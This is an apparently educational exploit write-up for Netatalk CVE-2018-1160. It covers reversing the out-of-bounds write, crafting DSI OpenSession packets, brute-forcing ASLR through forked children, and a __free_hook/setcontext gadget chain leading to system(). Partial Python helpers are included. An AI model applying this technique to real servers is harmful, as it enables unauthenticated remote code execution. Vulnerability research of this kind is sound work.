CVE-2018-1160 POC

Posted on Jun 10, 2025

Netatalk before 3.1.12 is vulnerable to an out of bounds write in dsi_opensess.c. This is due to lack of bounds checking on attacker controlled data. A remote unauthenticated attacker can leverage this vulnerability to achieve arbitrary code execution.

Finding the sink and the source

I decided to start with the raw binaries, partly to work on my reversing skills.

Library

We create a new Ghidra project and first inspect afpd. We see that a lot of dsi_* functions are imported. This is important, as the CVE advisory mentions that the vulnerability is in dsi_opensess.c.

We have only two binaries, afpd and libatalk. Let’s add the library to the project and inspect it. We immediately find the dsi_opensession function.

Analysing the code we want to rename variables and add comments to make going through the code easier.


void dsi_opensession(long acid)

{
  int iVar1;
  uint acid_length;
  uint uVar2;
  int *piVar3;
  char *pcVar4;
  undefined1 *acid_6e8;
  long lVar5;
  ulong uVar6;
  undefined8 *puVar7;
  ulong uVar8;
  byte bVar9;
  undefined8 *acid_6d8;
  byte acid_element;
  undefined8 *value;
  
  bVar9 = 0;
  iVar1 = setnonblock(*(undefined4 *)(acid + 0x10714));
  if (iVar1 < 0) {
     if (1 < DAT_0037fa48) {
        piVar3 = __errno_location();
        pcVar4 = strerror(*piVar3);
        make_log_entry(2,4,"dsi_opensess.c",0x1a,"dsi_opensession: setnonblock: %s",pcVar4);
     }
     netatalk_panic("setnonblock error");
                            /* WARNING: Subroutine does not return */
     abort();
  }
  uVar6 = 0;
  acid_6e8 = *(undefined1 **)(acid + 0x6e8);
  acid_6d8 = (undefined8 *)(acid + 0x6d8);
  if (*(long *)(acid + 0x106f8) != 0) {
     do {
        while( true ) {
                            /* acid_6e8[uvar6] == type */
           iVar1 = (int)uVar6;
           uVar8 = (ulong)(iVar1 + 1);
                            /* acid_6e8[uvar8] == length */
           acid_element = acid_6e8[uVar8]; // [1] -> we control the length
           acid_length = (uint)acid_element;
           if (acid_6e8[uVar6] != '\x01') break;
           value = (undefined8 *)(acid_6e8 + uVar8 + 1);
           if (acid_length < 8) {
			//[snip] - we don't care about lower lengths
           }
           else {
              *acid_6d8 = *value;
              *(undefined8 *)(acid + 0x6d0 + (ulong)acid_length) =
                     *(undefined8 *)((long)value + ((ulong)acid_length - 8)); // [2] - write at attacker controlled offset
              puVar7 = (undefined8 *)(acid + 0x6e0U & 0xfffffffffffffff8);
              lVar5 = (long)acid_6d8 - (long)puVar7;
              value = (undefined8 *)((long)value - lVar5);
              for (uVar6 = (ulong)(acid_length + (int)lVar5 >> 3); uVar6 != 0; uVar6 = uVar6 - 1) {
                 *puVar7 = *value;
                 value = value + (ulong)bVar9 * -2 + 1;
                 puVar7 = puVar7 + (ulong)bVar9 * -2 + 1;
              }
LAB_00126098:
              acid_6e8 = *(undefined1 **)(acid + 0x6e8);
           }
           acid_length = *(uint *)(acid + 0x6d8);
                            /* ntoh transformation */
           *(uint *)(acid + 0x6d8) =
                  acid_length >> 0x18 | (acid_length & 0xff0000) >> 8 | (acid_length & 0xff00) << 8 |
                  acid_length << 0x18;
           uVar6 = (ulong)(iVar1 + 2 + (uint)(byte)acid_6e8[uVar8]);
           if (*(ulong *)(acid + 0x106f8) <= uVar6) goto LAB_00125fd0;
        }
        uVar6 = (ulong)(iVar1 + 2 + acid_length);
     } while (uVar6 < *(ulong *)(acid + 0x106f8));
  }
LAB_00125fd0:
  *(undefined8 *)(acid + 0x106f8) = 0xc;
  *(undefined1 *)(acid + 0x598) = 1;
  *(undefined4 *)(acid + 0x59c) = 0;
  *acid_6e8 = 0;
  *(undefined1 *)(*(long *)(acid + 0x6e8) + 1) = 4;
  acid_length = *(uint *)(acid + 0x6e0);
                            /* ntoh transformation */
  uVar2 = acid_length >> 0x18 | (acid_length & 0xff0000) >> 8 | (acid_length & 0xff00) << 8 |
              acid_length << 0x18;
  if (acid_length < 32000) {
     uVar2 = 0x1000;
  }
  *(uint *)(*(long *)(acid + 0x6e8) + 2) = uVar2;
  *(undefined1 *)(*(long *)(acid + 0x6e8) + 6) = 2;
  *(undefined1 *)(*(long *)(acid + 0x6e8) + 7) = 4;
  *(undefined4 *)(*(long *)(acid + 0x6e8) + 8) = 0x80000000;
  acid_length = (uint)*(undefined8 *)(acid + 0x106f8);
                            /* ntoh transformation */
  *(uint *)(acid + 0x5a0) =
          acid_length >> 0x18 | (acid_length & 0xff0000) >> 8 | (acid_length & 0xff00) << 8 |
          acid_length << 0x18;
  dsi_stream_send(acid,*(undefined8 *)(acid + 0x6e8));
  return;
}

The first important part of the code is at [1], where we have a TLV (type-length-value) structure. All of these fields are attacker controlled. We want to focus especially on the length. At [2], the length is used to write into the structure without any bounds check, allowing an attacker to write past the end of the destination field.

This seems to be a classic out of bounds write.

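The line *(undefined8 *)(acid + 0x6d0 + (ulong)acid_length) = *(undefined8 *)((long)value + ((ulong)acid_length - 8)); copies the last 8 bytes of the value, read from value + (acid_length - 8), to acid + 0x6d0 + acid_length, which is the tail of a copy that starts at acid + 0x6d8. Together with the first store and the loop that follows, this looks like an inlined memcpy of acid_length bytes. Since acid_length is a single attacker-controlled byte, we can write up to 255 bytes of our own data starting at acid + 0x6d8, well past the field the copy was meant to fill. Also, lucky for us, the fields we overwrite shouldn’t be overwritten again further in the code, so once we write our bytes where we want them, we are done with them.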
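
To make the overflow concrete, here is a minimal Python model of the option loop. It is a sketch under assumptions, not Netatalk’s code: the name parse_options, the fake structure, and placing the quantum field at offset 0 of that buffer are all made up for illustration. Only the type value 0x01 and the unchecked one-byte length come from the decompilation above.

```python
ATTN_QUANTUM_TYPE = 0x01   # the type value the decompiled loop checks for
FIELD_SIZE = 4             # the destination field is a 32-bit integer


def parse_options(commands: bytes, fake_struct: bytearray) -> int:
    """Walk type-length-value options the way the vulnerable loop does.

    fake_struct is a hypothetical stand-in for the memory that starts at
    the quantum field. Returns how many bytes landed past that field.
    """
    overflow = 0
    i = 0
    while i + 1 < len(commands):
        opt_type = commands[i]
        length = commands[i + 1]              # attacker controlled, 0..255
        value = commands[i + 2:i + 2 + length]
        if opt_type == ATTN_QUANTUM_TYPE:
            # No check that length <= FIELD_SIZE: this is the bug being modelled.
            fake_struct[0:len(value)] = value
            overflow = max(overflow, len(value) - FIELD_SIZE)
        i += 2 + length
    return overflow


# A 4-byte value fits; a 16-byte value spills 12 bytes into whatever follows.
benign = bytes([0x01, 0x04]) + b"\x00\x00\x40\x00"
oversized = bytes([0x01, 0x10]) + b"A" * 16
print(parse_options(benign, bytearray(4 + 255)))
print(parse_options(oversized, bytearray(4 + 255)))
```

The fake structure is sized 4 + 255 bytes so that even the largest possible length stays inside the model.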

Now that we have discovered the sink, we must discover the source: how an unauthenticated remote attacker can reach this code, and how the bug can be exploited.

The dsi_opensession function is called only by dsi_getsession.

dsi_getsession is not called by any other function inside the library. However, it is exported to the main binary, so we will probably want to look there to find the actual source.

However, we must also understand what happens at this level.

A socket is created, and set to nonblock. Then, fork is used to create a child process. This is important to us, as only if the fork call succeeds will the dsi_getsession function be called.

If fork succeeds, here is the code that interests us:

  if (__pid == 0) {
  /* block 1 */
	lVar7 = *(long *)((long)param_1 + 8);
	*(undefined4 *)(lVar7 + 0x2370) = *(undefined4 *)(param_2 + 0x28);
	*(undefined4 *)(lVar7 + 0x2374) = *(undefined4 *)(param_2 + 0x2c);
	*(int *)(lVar7 + 0x2358) = local_cc;
	close(sock);
	close(*(int *)((long)param_1 + 0x10718));
	*(undefined4 *)((long)param_1 + 0x10718) = 0xffffffff;
	server_child_free(param_2);

/* block 2 */
	if (*(char *)((long)param_1 + 0x599) == '\x03') {
	  dsi_getstatus(param_1);
	  p_Var9 = (__fd_mask *)local_c8;
	  for (lVar7 = 0x10; lVar7 != 0; lVar7 = lVar7 + -1) {
		*p_Var9 = uVar8;
		p_Var9 = p_Var9 + 1;
	  }
	  lVar7 = __fdelt_chk((long)*(int *)((long)param_1 + 0x10714));
	  local_c8[lVar7] =
		   local_c8[lVar7] | 1L << ((byte)(*(int *)((long)param_1 + 0x10714) % 0x40) & 0x3f);
	  free(param_1);
	  select(0x400,(fd_set *)local_c8,(fd_set *)0x0,(fd_set *)0x0,(timeval *)&DAT_0037f5d0);
			/* WARNING: Subroutine does not return */
	  exit(0);
	}
/* block 3 */
	if (*(char *)((long)param_1 + 0x599) != '\x04') {
	  if (4 < debug_level) {
		make_log_entry(5,4,"dsi_getsess.c",0x79,"DSIUnknown %d");
	  }
	  (**(code **)((long)param_1 + 0x10760))(param_1);
			/* WARNING: Subroutine does not return */
	  exit(1);
	}
/* block 4 */
	*(long *)((long)param_1 + 0x6b8) = (long)param_3;
	*(long *)((long)param_1 + 0x6a8) = (long)param_3;
	*(undefined8 *)((long)param_1 + 0x6c0) = 0;
	*(undefined8 *)((long)param_1 + 0x6b0) = 0;
	dsi_opensession(param_1);
	*param_4 = 0;
	uVar8 = (ulong)uVar2;
  }

Let’s split this into blocks.

lVar7 = *(long *)((long)param_1 + 8);
*(undefined4 *)(lVar7 + 0x2370) = *(undefined4 *)(param_2 + 0x28);
*(undefined4 *)(lVar7 + 0x2374) = *(undefined4 *)(param_2 + 0x2c);
*(int *)(lVar7 + 0x2358) = local_cc;
close(sock);
close(*(int *)((long)param_1 + 0x10718));
*(undefined4 *)((long)param_1 + 0x10718) = 0xffffffff;
server_child_free(param_2);

Update Session Structure:

lVar7 = *(long *)((long)param_1 + 8) gets a pointer from param_1 + 8 (likely a session or server structure).
Copies fields from param_2 + 0x28 and param_2 + 0x2c (likely server configuration, e.g., port or address) to lVar7 + 0x2370 and lVar7 + 0x2374.
Sets lVar7 + 0x2358 to local_cc (the child’s socket for communication).

Close Unused Sockets:

Closes sock (the parent’s socket, not needed in the child).
Closes the socket at param_1 + 0x10718 (likely the original client socket) and sets it to -1.

Impact on dsi_opensession:

Sets up the session structure (param_1) with the child’s socket (local_cc), which dsi_opensession uses (at acid + 0x10714) for non-blocking I/O.
Ensures param_1 is ready for session processing.

if (*(char *)((long)param_1 + 0x599) == '\x03') {
  dsi_getstatus(param_1);
  p_Var9 = (__fd_mask *)local_c8;
  for (lVar7 = 0x10; lVar7 != 0; lVar7 = lVar7 + -1) {
	*p_Var9 = uVar8;
	p_Var9 = p_Var9 + 1;
  }
  lVar7 = __fdelt_chk((long)*(int *)((long)param_1 + 0x10714));
  local_c8[lVar7] =
	   local_c8[lVar7] | 1L << ((byte)(*(int *)((long)param_1 + 0x10714) % 0x40) & 0x3f);
  free(param_1);
  select(0x400,(fd_set *)local_c8,(fd_set *)0x0,(fd_set *)0x0,(timeval *)&DAT_0037f5d0);
		/* WARNING: Subroutine does not return */
  exit(0);
}

param_1 + 0x599 represents the command received. In this case, if the command is \x03, dsi_getstatus is called, and the child process exits. We want to avoid falling in this branch.

if (*(char *)((long)param_1 + 0x599) != '\x04') {
  if (4 < debug_level) {
	make_log_entry(5,4,"dsi_getsess.c",0x79,"DSIUnknown %d");
  }
  (**(code **)((long)param_1 + 0x10760))(param_1);
		/* WARNING: Subroutine does not return */
  exit(1);
}

If the command is neither \x03 nor \x04, it is invalid, so the child process exits with an error. This means that to reach the next block (our golden block, as it calls dsi_opensession) we must set this byte to \x04.

*(long *)((long)param_1 + 0x6b8) = (long)param_3;
*(long *)((long)param_1 + 0x6a8) = (long)param_3;
*(undefined8 *)((long)param_1 + 0x6c0) = 0;
*(undefined8 *)((long)param_1 + 0x6b0) = 0;
dsi_opensession(param_1);
*param_4 = 0;
uVar8 = (ulong)uVar2;

Finally, we get to the block that calls dsi_opensession.

This sets two values from the param_1 structure to param_3 (likely some sort of timeouts), and another two values to 0.

Then, we finally call our sink function.

Now it is time to move to the main binary and check the calls made to dsi_getsession.

Main Binary

As previously mentioned, the main binary only imports dsi_getsession. This function is called only once, in the main function.

main is a bit too big to go into all details here. This is the high-level summary of this code.

The main function initializes the Netatalk server by:

Parsing command-line and configuration files.
Setting up signal handlers and file descriptor limits.
Initializing the socket handler and CNID database.
Entering a poll loop to handle incoming connections and child process events.
Calling dsi_getsession for new connections, which forks a child process and calls dsi_opensession for DSI_OPENSESSION commands.
Managing configuration reloads and child process cleanup.

This is the outline of main_poll_loop, which waits for events on file descriptors. When the poll loop detects an incoming connection, it creates a session by calling dsi_getsession.

main_poll_loop:
do {
  while( true ) {
    pthread_sigmask(1,&local_158,(__sigset_t *)0x0);
    iVar5 = poll((pollfd *)*plVar14,(long)*(int *)((long)plVar14 + 0x14),-1);
    pthread_sigmask(0,&local_158,(__sigset_t *)0x0);
    if (DAT_0035c5b0 == 0) break;
    ...
  }
  ...
} while( true );

This is the code responsible for handling events.

if (iVar5 != 0) {
  if (iVar5 < 0) {
    if (__errnum != 4) {
      if (1 < (uint)type_configs._56_4_) {
        pcVar9 = strerror(__errnum);
        make_log_entry(2,3,"main.c",0x198,"main: can\'t wait for input: %s",pcVar9);
      }
      return 0;
    }
  }
  else {
    lVar11 = 0;
    if (0 < *(int *)((long)DAT_0035c5a8 + 0x14)) {
      do {
        if ((*(byte *)(*plVar14 + 6 + lVar11 * 8) & 0x39) != 0) {
          piVar8 = (int *)(lVar11 * 0x10 + plVar14[1]);
          if (*piVar8 == 0) {
            ...
          }
          else if (*piVar8 == 1) {
            uVar12 = *(undefined8 *)(piVar8 + 2);
            local_168.rlim_cur = 0;
            iVar5 = dsi_getsession(uVar12,DAT_0035c5b8,DAT_0035c5e4,&local_168);
            ...
          }
        }
        lVar11 = lVar11 + 1;
      } while (iVar5 + 1 < *(int *)((long)plVar14 + 0x14));
    }
  }
}

If poll returns events (iVar5 > 0):

Iterates over file descriptors in DAT_0035c5a8.
For each event, checks the type at piVar8:
If 0, handles IPC requests from children (ipc_server_read).
If 1, calls dsi_getsession(uVar12, DAT_0035c5b8, DAT_0035c5e4, &local_168) to start a new session.

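uVar12 becomes param_1 in dsi_getsession, which is then passed as acid to dsi_opensession. The client’s network data is reachable through it: the pointer stored at acid + 0x6e8 (acid_6e8 in the listing above) refers to the received packet.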

Before being passed as an argument uVar12 gets assigned a pointer from piVar8. uVar12 = *(undefined8 *)(piVar8 + 2);

Now, we know the complete flow of how a data packet gets from an attacker to the sink.

We can also confirm our analysis looking at the packet layout as per the specifications: https://en.wikipedia.org/wiki/Data_Stream_Interface.

dsi_hdr  = struct.pack(">BBHLLL",
                       0x00,          # Flags  (request)
                       0x04,          # Command (OpenSession)
                       0x0001,        # Req-ID
                       0x00000000,    # Error / Offset
                       0x00000006,    # Data-len
                       0x00000000)    # Reserved

option   = struct.pack(">BBL",
                       0x00,          # DSIOPT_SERVQUANT
                       0x04,          # length
                       0x00004000)    # 16 KB
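
The two pieces above can be wrapped into small helpers that keep the Data-len field in sync with the option bytes. This is a sketch: the helper names build_opensession and make_option are our own, and only the header format string and field values come from the snippet above. Note that the command byte is the second byte of the header, which lines up with the check on param_1 + 0x599 seen earlier.

```python
import struct

# flags, command, request ID, error/offset, data length, reserved
DSI_HEADER = struct.Struct(">BBHLLL")


def make_option(opt_type: int, value: bytes) -> bytes:
    """Encode one type-length-value option (hypothetical helper)."""
    if len(value) > 0xFF:
        raise ValueError("the option length is a single byte")
    return bytes([opt_type, len(value)]) + value


def build_opensession(options: bytes, request_id: int = 1) -> bytes:
    """Prefix the options with a DSI header whose command is 0x04."""
    header = DSI_HEADER.pack(0x00, 0x04, request_id, 0, len(options), 0)
    return header + options


# The same well-formed request as above: a 4-byte server quantum of 16 KB.
packet = build_opensession(make_option(0x00, struct.pack(">L", 0x4000)))
print(len(packet), packet.hex())
```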

Exploiting

While we found our sink using nothing but the provided binaries, we would like to have access to the source code as well, as it is open source. The code uses custom data structures that are hard to follow, so it is hard to pinpoint exactly what we are overwriting. The only way to continue analysing properly while relying only on the binary would be to create a custom datatype in Ghidra, but this seems like overkill.

The out-of-bounds write in the source code looks like this:

case DSIOPT_ATTNQUANT:  
memcpy(&dsi->attn_quantum, dsi->commands + i + 1,  
dsi->commands[i]);

Here dsi->commands + i + 1 is the value, dsi->commands[i] is the length, and the field we overflow is dsi->attn_quantum. Also note that the length is a single byte, so one copy writes at most 255 bytes.

typedef struct DSI {  
    struct DSI *next;             /* multiple listening addresses */  
    AFPObj   *AFPobj;  
    int      statuslen;  
    char     status[1400];  
    char     *signature;  
    struct dsi_block        header;  
    struct sockaddr_storage server, client;  
    struct itimerval        timer;  
    int      tickle;            /* tickle count */  
    int      in_write;           
    
    int      msg_request;       /* pending message to the client */  
    int      down_request;      /* pending SIGUSR1 down in 5 mn */    
    uint32_t attn_quantum, datasize, server_quantum;  
    uint16_t serverID, clientID;  
    uint8_t  *commands; /* DSI receive buffer */  
    uint8_t  data[DSI_DATASIZ];    /* DSI reply buffer */  
    size_t   datalen, cmdlen;

This is what the DSI struct looks like. We can overwrite attn_quantum, datasize, server_quantum, serverID, clientID, commands and part of data.

What is dsi->commands used for? The comment says it is the DSI receive buffer, which suggests it points to a buffer that an attacker can also write to.
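
To see how far the copy has to run to reach each field, we can model the tail of the struct with ctypes. This is a sketch under assumptions: DsiTail is a made-up name, it only covers the fields from attn_quantum onward, and it assumes a 64-bit build where the commands pointer is 8 bytes. The resulting offsets agree with the decompilation, where the copy starts at acid + 0x6d8 and the buffer pointer is read from acid + 0x6e8, which is 0x10 bytes later.

```python
import ctypes


class DsiTail(ctypes.Structure):
    """Fields from attn_quantum onward, in the order the struct lists them."""
    _fields_ = [
        ("attn_quantum", ctypes.c_uint32),
        ("datasize", ctypes.c_uint32),
        ("server_quantum", ctypes.c_uint32),
        ("serverID", ctypes.c_uint16),
        ("clientID", ctypes.c_uint16),
        ("commands", ctypes.c_uint64),    # stands in for a 64-bit pointer
        ("data", ctypes.c_uint8 * 8),     # only the first bytes of the reply buffer
    ]


# Print the distance of every field from the start of the copy.
for name, _ctype in DsiTail._fields_:
    print(f"{name:15s} +{getattr(DsiTail, name).offset:#x}")
```

Under these assumptions, a length of 0x18 is enough to replace the whole commands pointer, and anything longer starts eating into data.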

After the getsession call is made, a call to afp_over_dsi is made. This function has a main loop where it calls dsi_stream_receive(). Here the following call is made: dsi_stream_read(dsi, dsi->commands, dsi->cmdlen). This function reads data into dsi->commands.

Defeating ASLR

While the original exploit focused on an environment where this binary was not protected by ASLR, we must exploit in a more hardened environment. We don’t have / don’t know of any address leak vulnerability that could help us defeat ASLR.

However, remember that our code is running inside a fork(). This is important for us for 2 reasons:

We can crash the process as many times as we want, because only the forked child dies. If the code ran in the main process instead, a crash would take down the target.
Forked children start with a copy of the parent’s address space, so every child has the same memory layout. This means that if we find a valid address for one child, it is valid for every child.

These two conditions work in our favour as it means we can try to guess a valid address and get an idea of the address space at runtime.

We know that we can overwrite the commands pointer. The neat part is that if the address is invalid (not part of the heap or another mapped region), the child crashes and we get no response from the server. If we manage to guess a correct address (wherever it may point on the heap) we get a garbage response. So, we can keep guessing addresses until we get a response, which means we don’t need an address leak. Also, keep in mind that we want to find a valid heap page, not necessarily an exact address.
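
The guessing strategy can be tried out locally against a mock. The sketch below involves no network code: make_mock_oracle is a hypothetical stand-in for "did the child answer?", the memory map is invented, and the width of 6 bytes assumes 48-bit user-space addresses whose top two bytes are zero. Each round overwrites one more low byte of the pointer and keeps the first value, counting down from 0xFF, that still lands in mapped memory.

```python
from typing import Callable, List, Tuple


def make_mock_oracle(original_ptr: int,
                     mapped: List[Tuple[int, int]]) -> Callable[[bytes], bool]:
    """Build a local oracle: True if the partially overwritten pointer is mapped."""
    def oracle(low_bytes: bytes) -> bool:
        mask = (1 << (8 * len(low_bytes))) - 1
        # Keep the untouched high bytes, replace the low ones with our guess.
        candidate = (original_ptr & ~mask) | int.from_bytes(low_bytes, "little")
        return any(start <= candidate < end for start, end in mapped)
    return oracle


def guess_pointer(oracle: Callable[[bytes], bool], width: int = 6) -> int:
    """Recover some mapped address one byte at a time, lowest byte first."""
    known = b""
    for _ in range(width):
        for guess in range(0xFF, -1, -1):       # start at 0xFF and go down
            if oracle(known + bytes([guess])):
                known += bytes([guess])
                break
        else:
            raise RuntimeError("no byte value produced a response")
    return int.from_bytes(known, "little")


# Invented layout: two mapped regions and a pointer inside the second one.
regions = [(0x7F0000000000, 0x7F0000021000), (0x7F1234560000, 0x7F1234580000)]
oracle = make_mock_oracle(0x7F1234567010, regions)
print(hex(guess_pointer(oracle)))
```

The search never gets stuck in this model: the bytes accepted so far were validated together with the original high bytes, so the original value of the next byte is always an acceptable guess.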

Finding `libc` base

However, for a valid exploit more than just a random heap address is needed. Ideally, we want to find the base address of libc.

Let’s call the address we found in the previous step leaked_addr. Because we brute-forced each byte starting from 0xFF and going down, we end up with a rather high heap address, so libc_base = leaked_addr - offset.

However, how can we know the offset? Well, we are going to guess it as well. The offset should be anywhere between 0 and 0xffff000. We only try page-aligned values of the form 0xXXXX000, which gives 0x10000 (65,536) candidates, so this shouldn’t take too long.

If we guess the offset correctly, the exploit works; otherwise it fails.
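
The size of that search space is easy to check. A minimal sketch follows; the function name is ours, the sample leak is an invented value, and rounding the leak down to its page before subtracting is our assumption so that every candidate base is page aligned.

```python
PAGE = 0x1000
MAX_OFFSET = 0xFFFF000


def libc_base_candidates(leaked_addr: int):
    """Yield leaked page minus every page-aligned offset in [0, MAX_OFFSET]."""
    page = leaked_addr & ~(PAGE - 1)        # assumption: align the leak first
    for offset in range(0, MAX_OFFSET + PAGE, PAGE):
        yield page - offset


candidates = list(libc_base_candidates(0x7F123457FFFF))
count = len(candidates)
print(count, hex(candidates[0]), hex(candidates[-1]))
```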

Building a ROP chain

Now, armed with libc’s base address, it is time to build a ROP chain that we can use to get a shell.

Taking control

The first question here is how can we hijack the program’s execution flow? We have no possibility of overwriting the stack, so how can we somehow still do this? The answer is: hooks.

Hooks are special variables (function pointers) within the libc library. Their purpose is to help debug memory allocation. By default, each hook is NULL. However, if it’s set to the address of a function, then every time the hooked function is called anywhere in the program, the program will instead call the function pointed to by the hook.

We can overwrite any of the hooks and make them point to wherever* we want. Then, anytime the function we hooked is called, our code is actually executed. Considering the flow of our exploit, free is the most logical target, as it gets called once we close the socket to free all the memory used for the new connection.

* - of course, it needs to be valid executable code; NX is a thing, it’s not the 90s anymore

Our goal is to somehow call system. However, we have a problem. When free() gets called it receives as an argument a pointer to whatever memory the program tries to free. If we overwrite __free_hook with the system address, system will get that pointer as an argument. Instead, we must pass a valid command as an argument.
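
The argument problem is easier to see in a toy model. The sketch below is plain Python with no relation to libc internals beyond the behaviour described above; free_hook, real_free and fake_system are illustrative names. It shows that whatever the hook points to receives the pointer being freed, not a string of our choosing.

```python
from typing import Callable, List, Optional

free_hook: Optional[Callable[[int], None]] = None   # models __free_hook, NULL by default
calls: List[str] = []


def real_free(ptr: int) -> None:
    calls.append(f"real_free({ptr:#x})")


def free(ptr: int) -> None:
    """If the hook is set, it runs instead of the allocator."""
    if free_hook is not None:
        free_hook(ptr)
        return
    real_free(ptr)


def fake_system(arg: int) -> None:
    # Stand-in for system(): it is handed the freed pointer as its argument.
    calls.append(f"system({arg:#x})")


free(0x1000)                 # hook unset: the normal path runs
free_hook = fake_system      # models overwriting the hook
free(0x2000)                 # hook set: our target runs with the freed pointer
print(calls)
```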

Full takeover

A very useful gadget when it comes to such exploits is setcontext. setcontext is a legitimate libc function that can restore a full CPU context (all registers, instruction pointer, stack pointer) from a special structure in memory.

; setcontext + 53
mov     rsp, [rdi+0a0h]
mov     rbx, [rdi+80h]
mov     rbp, [rdi+78h]
mov     r12, [rdi+48h]
mov     r13, [rdi+50h]
mov     r14, [rdi+58h]
mov     r15, [rdi+60h]
mov     rcx, [rdi+0a8h]
push    rcx
mov     rsi, [rdi+70h]
mov     rdx, [rdi+88h]
mov     rcx, [rdi+98h]
mov     r8,  [rdi+28h]
mov     r9,  [rdi+30h]
mov     rdi, [rdi+68h]
xor     eax, eax
retn

Using setcontext we can place arbitrary values in both rdi and rip. If we overwrite rip with the system address and rdi with a valid command, then we get command execution.

However, we still have a problem - setcontext loads every one of these values from memory relative to rdi. So, before calling this function we must make rdi point to a memory address where we have stored just the right values.

Preparing for T-0 seconds

So, we must find a way to make rdi point to a controllable memory region - let’s call it mem.

_dl_open_hook is stored at an offset of +0x2BC0 from __free_hook. This means we can overwrite this address as well. This leads us to the libc_dlopen_mode + 56 gadget. This gadget first loads the value stored at the address of _dl_open_hook into the rax register. Then it calls the function pointer stored at the address now in rax.

mov     rax, qword ptr [rip + <offset_to__dl_open_hook>] ; essentially mov rax, cs:_dl_open_hook
call    qword ptr [rax]

The before-mentioned value is our mem pointer.

When libc_dlopen_mode + 56 executes call qword ptr [rax], it calls the pointer stored at mem. We control that memory, and we want this call to land on fgetpos64 + 207.

mov     rdi, rax
call    qword ptr [rax + 0x20]

This gadget simply copies rax to rdi, then calls a function pointer stored at mem+0x20. This means that finally rdi points to mem and we are ready to call setcontext. Of course, we now want to store the setcontext+53 value at mem+0x20 so it gets called by this pointer.

Putting it all together

So, to recap, we have the following ROP chain:

We want to overwrite __free_hook and _dl_open_hook. __free_hook will point to our first gadget and _dl_open_hook to memory we control.

Now, when free() gets called, the following chain of events happens:

libc sees that __free_hook != NULL, so it calls the address stored there, which is libc_dlopen_mode + 56.
libc_dlopen_mode + 56 loads the value of _dl_open_hook, which is a pointer to mem, into the rax register. Then it calls the function pointer stored at mem. This pointer must point to fgetpos64 + 207.
fgetpos64 + 207 copies rax to rdi, so now rdi points to mem. Finally, the pointer stored at rax+0x20 (which is mem+0x20) is called. This should point to setcontext + 53.
setcontext + 53 uses mem to set the execution context. rdi will point to our command string, and rip to system. We can use SigreturnFrame() to easily prepare mem for this operation. Once these registers are loaded, the final ret in setcontext jumps to the address it pushed, effectively calling system("cmd").
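
For readers who want to see the layout without pwntools, here is a rough sketch of what mem has to contain. Everything about it is illustrative: build_mem is our own name, all addresses are placeholders, the 0x200-byte size and the 0xB0 offset for the command string are arbitrary choices, and stack_addr is assumed to point at writable memory. Only the offsets 0x00, 0x20, 0x68, 0xA0 and 0xA8 come from the gadgets described above.

```python
import struct

MEM_SIZE = 0x200
CMD_OFF = 0xB0      # arbitrary spot after the last slot setcontext + 53 reads here


def build_mem(mem_addr: int, fgetpos_gadget: int, setcontext_gadget: int,
              system_addr: int, stack_addr: int, command: bytes) -> bytes:
    """Lay out the fake context at the offsets used by the gadget chain."""
    if CMD_OFF + len(command) + 1 > MEM_SIZE:
        raise ValueError("command does not fit in the buffer")
    mem = bytearray(MEM_SIZE)
    struct.pack_into("<Q", mem, 0x00, fgetpos_gadget)      # called via call [rax]
    struct.pack_into("<Q", mem, 0x20, setcontext_gadget)   # called via call [rax+0x20]
    struct.pack_into("<Q", mem, 0x68, mem_addr + CMD_OFF)  # loaded into rdi
    struct.pack_into("<Q", mem, 0xA0, stack_addr)          # loaded into rsp
    struct.pack_into("<Q", mem, 0xA8, system_addr)         # pushed, then reached by ret
    mem[CMD_OFF:CMD_OFF + len(command) + 1] = command + b"\x00"
    return bytes(mem)


# Placeholder values only, to show where each pointer ends up.
mem = build_mem(0x10000, 0x1111, 0x2222, 0x3333, 0x20000, b"id")
print(mem[:0xB8].hex())
```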

After putting everything together and writing an exploit, I got hit by a harsh reality: it takes time to brute-force things. Also, it didn’t help that my connection to the server was weak.

After some digging I found out that the server is hosted in Japan. I deployed a small VPS machine in Japan, and ran the exploit from that machine. The ping time was ~600 times faster, and so was the exploit time.